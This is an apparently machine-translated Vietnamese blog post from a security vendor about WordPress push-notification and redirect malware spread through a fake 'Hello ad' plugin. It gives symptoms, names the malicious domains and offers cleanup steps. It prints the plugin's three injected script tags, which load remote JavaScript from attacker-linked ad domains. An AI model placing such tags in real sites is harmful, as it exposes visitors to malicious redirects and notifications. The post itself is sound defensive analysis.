Kể từ vài tuần trước, các nhà nghiên cứu bảo mật tại Astra đã theo dõi phần mềm độc hại thông báo đẩy trên WordPress . Chiến dịch này đã được kết hợp với chiến dịch chuyển hướng đang diễn ra trên các trang web WordPress.
Một số miền độc hại đang xảy ra chuyển hướng bao gồm inpagepush [.] Com, asoulrox [.] Com và iclickcdn [.] Com, justcannabis [.] Online, 0.realhelpcompany [.] Ga, fast.helpmart [.] Ga / m [.] js? w =085, v.v.
Lần này, tin tặc đã đi trước một bước để làm cho chiến dịch hack này trở nên tinh vi hơn bằng cách cài đặt một plugin ‘Hello ad’ trông hợp pháp vào các trang web WordPress bị nhiễm độc. Thông tin thêm về nó bên dưới.
Hướng dẫn có Liên quan - Hoàn thành loại bỏ tấn công WordPress Hướng dẫn
Các triệu chứng của Phần mềm độc hại Thông báo Đẩy - WordPress
- Thông báo đẩy thô tục: Khách truy cập được hiển thị thông báo đẩy độc hại / thô tục khi truy cập trang web của bạn:
- Chuyển hướng Trang web: Trang web chuyển hướng đến các trang độc hại khi nhấp vào liên kết từ trang web của chúng tôi (lý tưởng nhất là chuyển hướng đến các trang trong WordPress của bạn)
Một số URL mà trang web của bạn có thể đang chuyển hướng để bao gồm inpagepush [.] Com, asoulrox [.] Com và iclickcdn [.] Com.
- Đã tìm thấy các plugin không xác định: Trong một số trường hợp, chúng tôi đã xác định được một plugin độc hại mới được thêm vào WordPress có tên là 'Xin chào quảng cáo'.
- Vi rút dành riêng cho thiết bị / Chỉ dành cho thiết bị di động: Chúng tôi nhận thấy rằng phần mềm độc hại này ẩn mình thực sự tốt. Nó không phải lúc nào cũng gửi thông báo đẩy hoặc chuyển hướng người dùng. Hành vi dành riêng cho thiết bị.
Đôi khi phần mềm độc hại chỉ hiển thị thông báo đẩy trên thiết bị di động và đôi khi nó chỉ chuyển hướng người dùng mới chứ không phải ai đó đã mở trang web trước đó.
Trường hợp tò mò về plugin quảng cáo Hello độc hại
Chúng tôi đã thấy plugin 'Xin chào quảng cáo' được thêm vào các trang web độc hại này để chuyển hướng người dùng đến các trang web do tin tặc kiểm soát.
Các plugin trông hợp pháp này thêm mã Javascript độc hại sau vào nguồn trang:
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>
Mã được bổ sung bởi plugin này đóng một vai trò quan trọng trong việc chuyển hướng. Mặc dù vậy, chúng tôi đã thấy tin tặc đang phát triển và làm xáo trộn điều này với mỗi chiến dịch mới.
Cách khắc phục Phần mềm độc hại Thông báo Đẩy, Chiến dịch Hack Quảng cáo Xin chào &Chuyển hướng
- Kiểm tra các địa điểm rõ ràng: Tin tặc có một vài nơi ưa thích để họ chèn mã vi-rút / phần mềm độc hại. Khi bắt đầu sửa WordPress, tốt nhất bạn nên bắt đầu với những thứ này. Các tệp sau đây nên được xem xét trước:
- index.php
- wp-content / themes / {themeName} /functions.php
- wp-config.php
- Tệp chủ đề cốt lõi
- .htaccess
- Tìm và xóa plugin quảng cáo xin chào: Nếu bạn tìm thấy plugin 'trông hợp pháp' này mà bạn cho rằng nhà phát triển của bạn hoặc bạn có thể đã cài đặt trong quá khứ - vui lòng hủy cài đặt vì đó không phải là trường hợp 🙂
Hướng dẫn có liên quan - Loại bỏ phần mềm độc hại trong WordPress
- Xoá Chuyển hướng: Các cuộc tấn công chuyển hướng WordPress đã xảy ra trong nhiều tháng nay. Việc xử lý các vụ tấn công chuyển hướng độc hại đòi hỏi bạn phải xem xét các bảng cơ sở dữ liệu, tệp chủ đề cốt lõi và đôi khi cả tệp cấu hình máy chủ của bạn. Tìm kiếm các tập lệnh / tài nguyên được tải từ các URL không xác định.
Vì phần mềm độc hại chuyển hướng rất phổ biến nên chúng tôi đã thực hiện một video chi tiết từng bước về cách khắc phục các lỗi chuyển hướng. Mặc dù tin tặc luôn cập nhật các phương pháp của họ để tránh lọt vào tầm ngắm của các công ty bảo mật, nhưng nguyên tắc cơ bản của chúng vẫn giống nhau.
Tin tặc luôn phát triển các phương pháp của họ, khai thác các lỗ hổng chưa được thế giới biết đến và kết hợp nhiều cách khai thác khác nhau để tạo ra một bản hack. Mặc dù xóa bản hack là một phần, nhưng việc đảm bảo người dùng không bao giờ bị tấn công đòi hỏi thứ gì đó lâu dài hơn - như bộ Astra’s Security 🙂